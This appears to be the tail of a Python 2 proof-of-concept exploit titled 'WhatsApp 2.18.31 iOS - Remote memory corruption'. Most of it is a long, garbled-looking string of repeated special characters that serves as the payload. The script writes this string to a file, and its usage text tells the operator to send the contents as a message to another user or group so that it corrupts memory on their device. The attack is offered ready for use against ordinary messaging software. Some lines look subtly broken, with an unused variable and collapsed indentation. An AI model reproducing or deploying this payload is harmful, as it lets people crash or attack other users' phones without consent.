a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/ aC/!aC/C/aC/PSaC/$?aC/Y=aC/|aC/SSaC/"aC/(c)aC/aaC/<<aC/!aC/aC/(r)aC/-aC/degaC/+-aC/2aC/3aC/'aC/uaC/PaC/*aC/,aC/1aC/oaC/>>aC/1/4aC/1/2aC/3/4aC/?aPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPS aPS!aPSC/aPSPSaPS$?aPSY=aPS|aPSSSaPS"aPS(c)aPSaaPS<<aPS!aPSaPS(r)aPS-aPSdegaPS+-aPS2aPS3aPS'aPSuaPSPaPS*aPS,aPS1aPSoaPS>>aPS1/4aPS1/2aPS3/4aPS?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$? a$?!a$?C/a$?PSa$?$?a$?Y=a$?|a$?SSa$?"a$?(c)a$?aa$?<<a$?!a$?a$?(r)a$?-a$?dega$?+-a$?2a$?3a$?'a$?ua$?Pa$?*a$?,a$?1a$?oa$?>>a$?1/4a$?1/2a$?3/4a$??aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY= aY=!aY=C/aY=PSaY=$?aY=Y=aY=|aY=SSaY="aY=(c)aY=aaY=<<aY=!aY=aY=(r)aY=-aY=degaY=+-aY=2aY=3aY='aY=uaY=PaY=*aY=,aY=1aY=oaY=>>aY=1/4aY=1/2aY=3/4aY=?a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a| a|!a|C/a|PSa|$?a|Y=a||a|SSa|"a|(c)a|aa|<<a|!a|a|(r)a|-a|dega|+-a|2a|3a|'a|ua|Pa|*a|,a|1a|oa|>>a|1/4a|1/2a|3/4a|?aSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSS aSS!aSSC/aSSPSaSS$?aSSY=aSS|aSSSSaSS"aSS(c)aSSaaSS<<aSS!aSSaSS(r)aSS-aSSdegaSS+-aSS2aSS3aSS'aSSuaSSPaSS*aSS,aSS1aSSoaSS>>aSS1/4aSS1/2aSS3/4aSS?a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a" a"!a"C/a"PSa"$?a"Y=a"|a"SSa""a"(c)a"aa"<<a"!a"a"(r)a"-a"dega"+-a"2a"3a"'a"ua"Pa"*a",a"1a"oa">>a"1/4a"1/2a"3/4a"?a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c) a(c)!a(c)C/a(c)PSa(c)$?a(c)Y=a(c)|a(c)SSa(c)"a(c)(c)a(c)aa(c)<<a(c)!a(c)a(c)(r)a(c)-a(c)dega(c)+-a(c)2a(c)3a(c)'a(c)ua(c)Pa(c)*a(c),a(c)1a(c)oa(c)>>a(c)1/4a(c)1/2a(c)3/4a(c)?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aa!aaC/aaPSaa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3aPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-!a-a-(r)a--adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)adegaadeg<<adeg!adegadeg(r)adegdegadeg+-adeg2adeg3adeg'adeguadegPadeg*adeg,adeg1adegoadeg>>adeg1/4adeg1/2adeg3/4adeg?a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+- a+-!a+-C/a+-PSa+-$?a+-Y=a+-|a+-SSa+-"a+-(c)a+-aa+-<<a+-!a+-a+-(r)a+--a+-dega+-+-a+-2a+-3a+-'a+-ua+-Pa+-*a+-,a+-1a+-o'
sutf8 = payload.encode('UTF-8')
finalPoC = payload*6
print "[*] Writing to file: " + filename
open(filename, 'w').write("\n".join(payload))
print "[*] Done."
def howtouse():
print "Usage: whatsapp.py [FILENAME]"
print "[*] Mandatory arguments:"
print "[-] FILENAME"
sys.exit(-1)
if __name__ == "__main__":
try:
print "[*] WhatsApp 2.18.31 iOS - Remote memory corruption"
print "[*] Author: jsacco@exploitpack.com - http://exploitpack.com"
print "[*] How to use: Copy the content of the file and send
it as a message to another whatsapp user or group"
whatsapp(sys.argv[1])
except IndexError:
howtouse()
|